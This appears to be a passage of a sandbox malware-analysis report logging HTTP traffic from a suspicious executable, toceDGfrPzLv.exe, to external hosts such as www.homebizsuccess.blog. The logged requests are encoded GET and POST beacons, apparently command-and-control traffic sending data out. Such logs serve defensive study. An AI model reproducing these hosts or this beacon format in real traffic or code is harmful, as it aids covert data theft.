              Data Ascii: FR=y1TU7gLT4jEuaJgk0bgomuj7CQRzgH9XqbsDB30FnXmki/fggqyL2s6jkE4vvt08HF/lFEh7dZbJ0R/mwkkrWVtM4LuQm9EKoAedKNX+F43U+anfb4YecxVwKYdK+vaeDpRW17vvNWXqvWcPMplcqnC5Pixt38YJoNx3LSr38aEMqJC3f2ykwTdtA+G6Tu+Kzpfw9zuxW2at+Nu3USRlC/SpOoi0qFQO79FbTNP4jMiePz93B/Esk2uq+LfQy12zK/Hkm4tbCDggW3RBShVbUuqXNYXiDf+TPDyQF0873sim0uetzwAJ0ohp/qawLtUnhQCJWrHKMJec8SLXTxRcGUcNlTMyikGykI+/q6xjiM7EPGzL9VyuoKHfY7yrnPW5Nj/CnVyh6G4mjWSIdinrhF5zq547NHuFOnGCENT3kuO3UFtgIGuXC0NvcSHfYzK0mc6IgYl3dXN1L6tfoKH+OXNLZUDKVa5YG/Y41o1zAXT7oQsUSQ7CdBHG+yMCoBriwNsJp2092/zD27tWngy2QgUM6oqyyksDoMZ5Ep+aDsrUy7sZipAIck9oHLUHlxpPFJkaWWv943EQnHuw/CjwcqSpbcnpbJFMxlUa9U4bDpj300f1RrFYO5Lsg7kfCQ5ayP2RLepqlyVD11fLrwxhJzFr6s60tkGI3YpRhPjAAU/KkUSKFnneucd52YY8/Im+iiTke/CZMRM7IXlauU6nBUzXEsEwdmpU2gpLUF2pCfPaJhrROs5W/EHVd/yOKwy5Ocsczir+RfFu+gMMgI4keNRA2M4oHsMu582mN2mDIRSrjswSgn+UxT5w9miUKgMpGfk6KGx8ZcN9tX7m6fllKHzzc36ZkT8P/LRNdb+TZfF0gNSJhAyhiGo9+9aH7REZ35jca+7pXCXJ62RPHIAxYeO+fHg22sHEBGUAY2INdc3X2P2nDImPY0By74JU6JAFtFNPd3RdpfopH2AUwIIsgTjxf9CSHXko4HvvBthrijm+sTnkL [TRUNCATED]
              Sep 6, 2024 09:05:32.775672913 CEST1236INHTTP/1.1 404 Not Found
              Server: nginx/1.20.1
              Date: Fri, 06 Sep 2024 07:05:32 GMT
              Content-Type: text/html
              Content-Length: 3650
              Connection: close
              ETag: "663a05b6-e42"
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
              Sep 6, 2024 09:05:32.775707006 CEST1236INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
              Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
              Sep 6, 2024 09:05:32.775719881 CEST1236INData Raw: 3c 68 31 3e 3c 73 74 72 6f 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20
              Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
              Sep 6, 2024 09:05:32.775732040 CEST115INData Raw: 46 65 64 6f 72 61 20 5d 22 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 38 38 22 20 68 65 69 67 68 74 3d 22 33 31 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20
              Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              8192.168.2.649734162.240.81.18805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:05:34.753987074 CEST536OUTGET /wxmz/?FR=/3704Vff3w19bJxFjboY/IbcCRxq7QB064cYUEYQjha4p4PIlcXs4dWmoF91tthlGgXSeDBpFM7AphPZ13xvSCd02IeXzvs2jATKINKka4nP9dH8TaBgBhg9ZbFNrO+hXaJ7nrQ=&yXghy=KTox HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.sorriragora.online
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:05:35.323096037 CEST1236INHTTP/1.1 404 Not Found
              Server: nginx/1.20.1
              Date: Fri, 06 Sep 2024 07:05:35 GMT
              Content-Type: text/html
              Content-Length: 3650
              Connection: close
              ETag: "663a05b6-e42"
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
              Sep 6, 2024 09:05:35.323205948 CEST1236INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
              Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
              Sep 6, 2024 09:05:35.323220015 CEST1236INData Raw: 3c 68 31 3e 3c 73 74 72 6f 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20
              Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
              Sep 6, 2024 09:05:35.323237896 CEST115INData Raw: 46 65 64 6f 72 61 20 5d 22 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 38 38 22 20 68 65 69 67 68 74 3d 22 33 31 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20
              Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              9192.168.2.649736192.185.16.209805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:05:41.032069921 CEST812OUTPOST /xvas/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.homebizsuccess.blog
              Content-Length: 207
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.homebizsuccess.blog
              Referer: http://www.homebizsuccess.blog/xvas/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 45 2f 58 73 66 6e 43 63 37 44 66 6d 4c 67 4e 69 34 61 74 43 73 39 2b 49 62 46 59 6a 6c 6d 65 76 75 45 47 76 61 31 5a 65 78 48 61 31 61 47 55 74 43 52 58 31 71 43 54 38 53 75 79 77 55 6f 49 43 61 43 63 50 70 75 48 4f 49 64 68 44 62 62 5a 41 56 64 4d 4f 51 48 50 67 36 42 34 58 65 4b 70 73 74 72 41 78 30 5a 33 7a 67 31 46 38 36 36 67 31 6a 53 76 4f 69 39 35 68 79 64 7a 4a 64 55 78 2f 4c 4a 7a 79 2f 75 45 4c 4c 4f 67 48 69 4b 4d 75 50 57 42 30 7a 2f 32 41 59 78 76 69 2f 50 4d 41 72 35 63 31 6d 6c 50 7a 64 57 4d 30 69 4e 56 36 2f 76 50 2b 44 31 46 46 42 4a 6f 33 2b 64 50 39 38 6f 58 4c 4e 4e 33 52 31 2b 30 39
              Data Ascii: FR=E/XsfnCc7DfmLgNi4atCs9+IbFYjlmevuEGva1ZexHa1aGUtCRX1qCT8SuywUoICaCcPpuHOIdhDbbZAVdMOQHPg6B4XeKpstrAx0Z3zg1F866g1jSvOi95hydzJdUx/LJzy/uELLOgHiKMuPWB0z/2AYxvi/PMAr5c1mlPzdWM0iNV6/vP+D1FFBJo3+dP98oXLNN3R1+09
              Sep 6, 2024 09:05:41.648008108 CEST1236INHTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:05:41 GMT
              Server: Apache
              Expires: Wed, 11 Jan 1984 05:00:00 GMT
              Cache-Control: no-cache, must-revalidate, max-age=0
              Link: <https://homebizsuccess.blog/wp-json/>; rel="https://api.w.org/"
              Upgrade: h2,h2c
              Connection: Upgrade
              Vary: Accept-Encoding
              Content-Encoding: gzip
              X-Endurance-Cache-Level: 2
              X-nginx-cache: WordPress
              Content-Length: 11436
              Content-Type: text/html; charset=UTF-8
              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 72 fd 73 db 46 96 ed cf 52 55 fe 87 36 5c 63 91 09 1b e0 97 28 89 12 99 75 9c cc 66 a6 92 b5 2b f6 ec bc ad d8 a5 6d 00 97 40 5b 8d 6e 4c 77 83 14 ad e8 7f 7f b7 01 7e 80 14 29 c9 b6 b2 ef d5 ca 26 09 dc 8f 73 cf 3d f7 5c 3c fb f1 f5 ab 77 ff f5 e6 27 92 da 4c 8c bf 39 bc 70 bf 44 30 99 8c 3c 90 f4 1f 6f bd 32 08 2c c6 df 83 8b 67 94 92 5f c1 32 42 69 f9 9e b9 e7 28 65 da 80 1d 79 ff 78 f7 57 7a ea ad 13 92 65 30 f2 a6 1c 66 b9 d2 d6 23 91 92 16 24 16 ce 78 6c d3 51 0c 53 1e 01 2d 5f 5a 84 4b 6e 39 13 d4 44 4c c0 a8 e3 ad e6 fd c2 e5 d5 72 9e 70 cf 1a c4 c8 cb b5 9a 70 01 1e 49 35 4c 46 5e 6a 6d 3e 0c 82 24 cb 13 5f e9 24 b8 9e c8 a0 b3 00 a9 35 71 99 84 2c ba da ea 4a 55 06 21 ff 64 8a 28 02 63 fc 50 28 04 c8 84 ce 23 3f 4f f3 35 93 7f be 21 3f a3 12 4b 32 96 5b 01 e3 37 2c 01 22 95 25 13 55 c8 98 bc 78 7e da ed 74 ce c9 cf 88 49 7e e0 9f c8 db 0a f5 22 a8 ca 0f 6b d2 1c 69 15 2a 6b 8e 56 c2 1c 65 ec 9a f2 0c 11 69 ae c1 09 37 14 4c 27 70 44 02 6c 5c ed 71 14 4b e3 [TRUNCATED]
              Data Ascii: rsFRU6\c(uf+m@[nLw~)&s=\<w'L9pD0<o2,g_2Bi(eyxWze0f#$xlQS-_ZKn9DLrppI5LF^jm>$_$5q,JU!d(cP(#?O5!?K2[7,"%Ux~tI~"ki*kVei7L'pDl\qK&`hkx'J%XlcvYY11`r;UsW.OJejm%Z4IH.hXG6eUgo2k2.H9J/Al~t{tO!s&_%T{WxSl[;T{re$h@IKGhw{{=#Rn h4N&%7Sj/$j@ySk<'^Os[ [47Vd-nj|6vD3tORn-9j
              Sep 6, 2024 09:05:41.648026943 CEST1236INData Raw: f2 1f 5c da 5e f7 a5 d6 6c de 00 3f 41 4e ee 96 c8 9d 3d 06 da 8f b1 b0 d9 d2 a3 c6 57 70 92 25 a7 d6 53 b1 69 9e 6b b0 85 96 c4 fa 80 26 98 37 56 77 45 f9 9a 37 8b 24 8c 46 23 fd bb fd 70 db 5c 0b 5c 2c 05 36 33 ee e4 c7 ea 08 1d e5 4d 04 4b bc
              Data Ascii: \^l?AN=Wp%Sik&7VwE7$F#p\\,63MKxd{_L=y_tx{:g{v4_xa=aw&ZV{'r|'yyGAmu+NHTvY_}iG^!cpld9W
              Sep 6, 2024 09:05:41.648041010 CEST1236INData Raw: 72 ef 8a b2 a1 5c e2 86 0b ea 5b 28 e3 c3 c3 03 9e 25 28 29 35 19 17 30 6f 11 f7 5a b6 93 9b c3 83 83 98 9b 5c b0 f9 90 54 20 e4 19 cf dc e5 99 b4 e7 98 0d 95 c6 a5 86 44 aa 1d a9 6b 6a 52 86 77 d8 99 4e 81 27 a9 1d 92 0e 64 5b 19 14 c3 a6 bb 12
              Data Ascii: r\[(%()50oZ\T DkjRwN'd[IoIVGLP&xepL*dUfl$n]EGWTP3=Y(6~tEsLfMyrF3.L0V$hf!&jVKM|-8]D{I/:C5
              Sep 6, 2024 09:05:41.648103952 CEST1236INData Raw: 39 13 3c 91 94 5b c8 cc 90 44 20 2d e8 3b 4d 64 4c 86 dc 34 be 6d 91 98 4f 9b 37 19 d3 09 97 c8 e2 2e 03 c7 71 cd c0 bd 6d 80 b9 c0 7e b0 e5 ca a8 6b 28 54 74 45 23 25 8a 4c 9a dd 3a 75 eb 2a dd d3 52 93 6d 77 4b ae 8c a5 b8 3f 72 b6 b0 7b 56 c7
              Data Ascii: 9<[D -;MdL4mO7.qm~k(TtE#%L:u*RmwK?r{VVomO.VT)M/Z63J[&#3#v R#9@s.~OyL5ZB[p%L&ug3Xe<IduGo9bJnu
              Sep 6, 2024 09:05:41.648117065 CEST1236INData Raw: b0 8c 8b f9 e8 17 66 d5 5f 7a 2f 7b ed f6 5f ba af fa e5 f7 71 f9 7d 82 df 27 af 7e 75 ed a0 71 d0 de a2 ee c0 14 21 0a f0 97 de 8f 82 59 2e 31 5c fe 52 dc e9 c5 f3 76 ef f4 fc 49 8e 16 4f af 28 ae cc 99 a0 26 65 9a cb e4 cb 4f 77 17 6b 79 43 77
              Data Ascii: f_z/{_q}'~uq!Y.1\RvIO(&eOwkyCwj:~uM<UTeG-#ZT/o/9Y^y9-#Y9[EN^UT{+X?17`|m?;qv/^Y:u^cQy[DZ4GO/LynY^9#*k
              Sep 6, 2024 09:05:41.648128033 CEST1236INData Raw: ce ea 8b 68 77 4f 34 62 e8 c3 75 a0 77 37 b0 35 83 25 5c 96 27 a6 42 6d 00 ae 13 6e 0f 2a 8b 2c 04 0d 71 99 bc 73 13 b7 cb 52 27 7f c6 e3 04 2c f1 2d 4b 22 a1 8a b2 65 69 a9 2a 67 96 45 5b 6c 76 df ba 4e 76 3b 74 a7 23 52 d2 82 b4 e8 a5 47 d4 f4
              Data Ascii: hwO4buw75%\'Bmn*,qsR',-K"ei*gE[lvNv;t#RGQD&RY!C:n[ex\7s!dzDhEWV+`3.lg(%!*M9.(z->Q*A|LBv*BS:[7k5En9>"7Rr=yawy3nx
              Sep 6, 2024 09:05:41.648144960 CEST1236INData Raw: 28 a5 7f 22 a1 d3 f6 35 7e 2a 42 8e 40 06 96 11 c9 32 18 79 99 71 1c 78 c4 2c c7 e3 be c3 db fd 2d 63 09 78 64 31 e3 a9 b9 74 4f da d7 f8 59 71 f9 06 ff 5d 04 29 b0 78 8c 0f a1 8a e7 24 12 cc a0 64 a0 b5 d2 fd 76 9f 40 3a a1 16 b2 5c 30 0b d4 a8
              Data Ascii: ("5~*B@2yqx,-cxd1tOYq])x$dv@:\0H2Qv#h4T*,iUV/0U|dbt{)McBZ[.b>%<yy%_+8%Kdh>8#XuB+0=+;T)O<+g*cW3(%J
              Sep 6, 2024 09:05:41.648258924 CEST1236INData Raw: b8 05 8a 1c 2c 48 bb b0 4f e5 a1 b5 cd 16 95 cb 49 91 40 36 13 7e bd 34 9b ab 5f 61 2f 91 96 4d 91 12 04 3f f4 cc 55 bb fa 3a 62 ce 12 a0 86 cb 44 c0 32 bd 2f 4f 4b d2 8b 89 17 69 67 a3 c4 72 eb 10 4a 79 c7 6f 95 d6 f3 16 79 97 72 43 de 60 96 fc
              Data Ascii: ,HOI@6~4_a/M?U:bD2/OKigrJyoyrC`Wi'K82WasH"S3"J&6\scQB25'VbLaP362&"|1JuLs]GXN:Rks3TeO"0Jv!v{B#e^Xby!"
              Sep 6, 2024 09:05:41.648272991 CEST1236INData Raw: 64 c2 05 67 16 88 e0 f2 8a 30 0d 6c 41 bd e2 b5 f8 7b a3 66 a0 21 26 e1 9c e0 51 2c d3 b8 c2 c8 0b 05 93 57 de e2 46 a9 b5 f9 30 08 66 b3 99 6f 54 a4 11 d2 d8 14 32 f0 23 95 05 1e d1 20 46 9e 54 13 25 84 9a 79 e3 b7 8b 12 e2 ce b9 29 e1 f3 6d fa
              Data Ascii: dg0lA{f!&Q,WF0foT2# FT%y)m5WlfcZ_`,*>A(9y\Z~;n\XA3EU&grX[hPE 2BUX<(]r\yP{N|[y4W^ZB!
              Sep 6, 2024 09:05:41.648284912 CEST758INData Raw: 43 ea b4 0f 16 41 7f a2 f4 4f 2c 4a 97 75 f3 cd aa 03 3e 59 26 7c 6e d6 03 64 82 75 ab a2 03 01 bb e8 21 ad aa d3 32 9d 80 3d 5f 95 f3 49 63 57 79 1d f1 e0 6e de 8f 04 33 e6 17 6e ac cf e2 b8 41 8e ea 6a 1d ad c4 c2 bf db c3 fd 28 4b 61 fc 42 aa
              Data Ascii: CAO,Ju>Y&|ndu!2=_IcWyn3nAj(KaB]n[hXu0v.Nj~}iWUG?JK%ek@:*,n$%VQ~rYwGeqko+Dv\TsymMY


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              10192.168.2.649737192.185.16.209805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:05:43.572170019 CEST836OUTPOST /xvas/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.homebizsuccess.blog
              Content-Length: 231
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.homebizsuccess.blog
              Referer: http://www.homebizsuccess.blog/xvas/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 45 2f 58 73 66 6e 43 63 37 44 66 6d 5a 54 6c 69 2b 4e 35 43 6b 39 2b 48 46 56 59 6a 2b 57 66 48 75 45 4b 76 61 33 31 4f 78 78 4b 31 5a 6a 77 74 42 51 58 31 70 43 54 38 48 65 79 73 4a 34 49 5a 61 43 51 48 70 76 37 4f 49 64 6c 44 62 5a 42 41 56 71 67 4e 52 58 50 69 6a 78 34 52 44 61 70 73 74 72 41 78 30 5a 79 6b 67 31 4e 38 39 4b 51 31 6a 32 37 50 6f 64 35 67 36 39 7a 4a 4b 6b 78 7a 4c 4a 79 58 2f 71 4d 74 4c 4e 59 48 69 4c 38 75 50 48 42 33 67 66 32 47 57 52 75 73 75 4f 68 66 7a 5a 31 61 68 6d 2f 4a 4e 6c 49 30 71 62 55 67 6a 63 50 64 52 6c 6c 48 42 4c 77 46 2b 39 50 58 2b 6f 76 4c 66 61 37 32 36 4b 52 65 4e 71 68 58 6d 59 51 44 65 50 37 55 76 37 45 4d 47 68 44 56 74 51 3d 3d
              Data Ascii: FR=E/XsfnCc7DfmZTli+N5Ck9+HFVYj+WfHuEKva31OxxK1ZjwtBQX1pCT8HeysJ4IZaCQHpv7OIdlDbZBAVqgNRXPijx4RDapstrAx0Zykg1N89KQ1j27Pod5g69zJKkxzLJyX/qMtLNYHiL8uPHB3gf2GWRusuOhfzZ1ahm/JNlI0qbUgjcPdRllHBLwF+9PX+ovLfa726KReNqhXmYQDeP7Uv7EMGhDVtQ==
              Sep 6, 2024 09:05:44.232013941 CEST1236INHTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:05:44 GMT
              Server: Apache
              Expires: Wed, 11 Jan 1984 05:00:00 GMT
              Cache-Control: no-cache, must-revalidate, max-age=0
              Link: <https://homebizsuccess.blog/wp-json/>; rel="https://api.w.org/"
              Upgrade: h2,h2c
              Connection: Upgrade
              Vary: Accept-Encoding
              Content-Encoding: gzip
              X-Endurance-Cache-Level: 2
              X-nginx-cache: WordPress
              Content-Length: 11436
              Content-Type: text/html; charset=UTF-8
              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 72 fd 73 db 46 96 ed cf 52 55 fe 87 36 5c 63 91 09 1b e0 97 28 89 12 99 75 9c cc 66 a6 92 b5 2b f6 ec bc ad d8 a5 6d 00 97 40 5b 8d 6e 4c 77 83 14 ad e8 7f 7f b7 01 7e 80 14 29 c9 b6 b2 ef d5 ca 26 09 dc 8f 73 cf 3d f7 5c 3c fb f1 f5 ab 77 ff f5 e6 27 92 da 4c 8c bf 39 bc 70 bf 44 30 99 8c 3c 90 f4 1f 6f bd 32 08 2c c6 df 83 8b 67 94 92 5f c1 32 42 69 f9 9e b9 e7 28 65 da 80 1d 79 ff 78 f7 57 7a ea ad 13 92 65 30 f2 a6 1c 66 b9 d2 d6 23 91 92 16 24 16 ce 78 6c d3 51 0c 53 1e 01 2d 5f 5a 84 4b 6e 39 13 d4 44 4c c0 a8 e3 ad e6 fd c2 e5 d5 72 9e 70 cf 1a c4 c8 cb b5 9a 70 01 1e 49 35 4c 46 5e 6a 6d 3e 0c 82 24 cb 13 5f e9 24 b8 9e c8 a0 b3 00 a9 35 71 99 84 2c ba da ea 4a 55 06 21 ff 64 8a 28 02 63 fc 50 28 04 c8 84 ce 23 3f 4f f3 35 93 7f be 21 3f a3 12 4b 32 96 5b 01 e3 37 2c 01 22 95 25 13 55 c8 98 bc 78 7e da ed 74 ce c9 cf 88 49 7e e0 9f c8 db 0a f5 22 a8 ca 0f 6b d2 1c 69 15 2a 6b 8e 56 c2 1c 65 ec 9a f2 0c 11 69 ae c1 09 37 14 4c 27 70 44 02 6c 5c ed 71 14 4b e3 [TRUNCATED]
              Data Ascii: rsFRU6\c(uf+m@[nLw~)&s=\<w'L9pD0<o2,g_2Bi(eyxWze0f#$xlQS-_ZKn9DLrppI5LF^jm>$_$5q,JU!d(cP(#?O5!?K2[7,"%Ux~tI~"ki*kVei7L'pDl\qK&`hkx'J%XlcvYY11`r;UsW.OJejm%Z4IH.hXG6eUgo2k2.H9J/Al~t{tO!s&_%T{WxSl[;T{re$h@IKGhw{{=#Rn h4N&%7Sj/$j@ySk<'^Os[ [47Vd-nj|6vD3tORn-9j
              Sep 6, 2024 09:05:44.232034922 CEST1236INData Raw: f2 1f 5c da 5e f7 a5 d6 6c de 00 3f 41 4e ee 96 c8 9d 3d 06 da 8f b1 b0 d9 d2 a3 c6 57 70 92 25 a7 d6 53 b1 69 9e 6b b0 85 96 c4 fa 80 26 98 37 56 77 45 f9 9a 37 8b 24 8c 46 23 fd bb fd 70 db 5c 0b 5c 2c 05 36 33 ee e4 c7 ea 08 1d e5 4d 04 4b bc
              Data Ascii: \^l?AN=Wp%Sik&7VwE7$F#p\\,63MKxd{_L=y_tx{:g{v4_xa=aw&ZV{'r|'yyGAmu+NHTvY_}iG^!cpld9W
              Sep 6, 2024 09:05:44.232048988 CEST1236INData Raw: 72 ef 8a b2 a1 5c e2 86 0b ea 5b 28 e3 c3 c3 03 9e 25 28 29 35 19 17 30 6f 11 f7 5a b6 93 9b c3 83 83 98 9b 5c b0 f9 90 54 20 e4 19 cf dc e5 99 b4 e7 98 0d 95 c6 a5 86 44 aa 1d a9 6b 6a 52 86 77 d8 99 4e 81 27 a9 1d 92 0e 64 5b 19 14 c3 a6 bb 12
              Data Ascii: r\[(%()50oZ\T DkjRwN'd[IoIVGLP&xepL*dUfl$n]EGWTP3=Y(6~tEsLfMyrF3.L0V$hf!&jVKM|-8]D{I/:C5
              Sep 6, 2024 09:05:44.232156038 CEST1236INData Raw: 39 13 3c 91 94 5b c8 cc 90 44 20 2d e8 3b 4d 64 4c 86 dc 34 be 6d 91 98 4f 9b 37 19 d3 09 97 c8 e2 2e 03 c7 71 cd c0 bd 6d 80 b9 c0 7e b0 e5 ca a8 6b 28 54 74 45 23 25 8a 4c 9a dd 3a 75 eb 2a dd d3 52 93 6d 77 4b ae 8c a5 b8 3f 72 b6 b0 7b 56 c7
              Data Ascii: 9<[D -;MdL4mO7.qm~k(TtE#%L:u*RmwK?r{VVomO.VT)M/Z63J[&#3#v R#9@s.~OyL5ZB[p%L&ug3Xe<IduGo9bJnu
